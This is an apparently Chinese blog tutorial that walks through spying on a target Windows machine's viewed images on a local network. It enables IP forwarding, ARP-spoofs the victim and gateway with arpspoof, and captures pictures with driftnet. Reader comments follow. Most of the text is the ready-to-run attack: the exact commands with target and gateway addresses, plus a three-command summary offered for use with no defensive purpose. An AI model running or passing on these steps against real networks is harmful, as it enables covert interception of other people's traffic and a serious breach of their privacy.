本例主要功能实现的是在局域网内,窥探指定机器的浏览的照片信息,如:百度图片、QQ照册等。
接下来说明一下测试环境中,各个机器的环境及IP地址。
网关:192.168.10.1
被欺骗的机器:Win7 192.168.10.178
Kali : 192.168.10.140
特殊说明一下,本次操作要实现图片的窥探,我们使用的命令,需要使用图形化界面,所以我们直接在Kali中操作。
1. 数据转发
# IP流量转发(echo是不会有回显的) echo 1 >/proc/sys/net/ipv4/ip_forward
2. arp欺骗攻击
这里我们所使用的命令与之前我们所使用的断网攻击是同一个命令,也就是arpspoof,接下来我们直接操作吧。
# ARP欺骗,也是之前的断网攻击 arpspoof -i eth0 -t 192.168.10.178 192.168.10.1
说明:由于新版本的kali Linux已经取消了 arpspoof 工具的使用,所以需要使用“ apt-get install dsniff ”命令安装一下。
命令中,-i eth0中,eth0为本机的网卡名称,大家需要根据自己的网卡名称对应修改。
命令中,-t 192.168.10.178中,192.168.10.178为被攻击机器的IP。
命令中,192.168.10.1为网关。
3. 获取目标机器的图片
接下来我们要在kali中,重新打开一个命令窗口,之前的窗口不要关闭,命令也不要停止,使用driftnet 来监听网卡。
# 获取图片(欺骗中做操作) driftnet -i eth0
说明:新版本kali linux 已经取消了drifnet 工具,需要使用 “ apt-get install drifnet ” 安装一下。
在弹出的新窗口中,将其最大化,这样方便我们查看目标机器的图片,如下图所示。
接下来我们就在被欺骗的机器上操作,我们这里打百度图片,来进行测试查看结果。
命令汇总(只有三条命令)
# IP流量转发(echo是不会有回显的) echo 1 >/proc/sys/net/ipv4/ip_forward # ARP欺骗,也是之前的断网攻击 arpspoof -i eth0 -t 192.168.10.178 192.168.10.1 # 获取图片(欺骗中做操作) driftnet -i eth0
声明:本站所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。
评论(2)
都已经断网攻击了,目标机器怎么浏览图片
目标机器打开百度图片,或者QQ像册,就可以被看到了。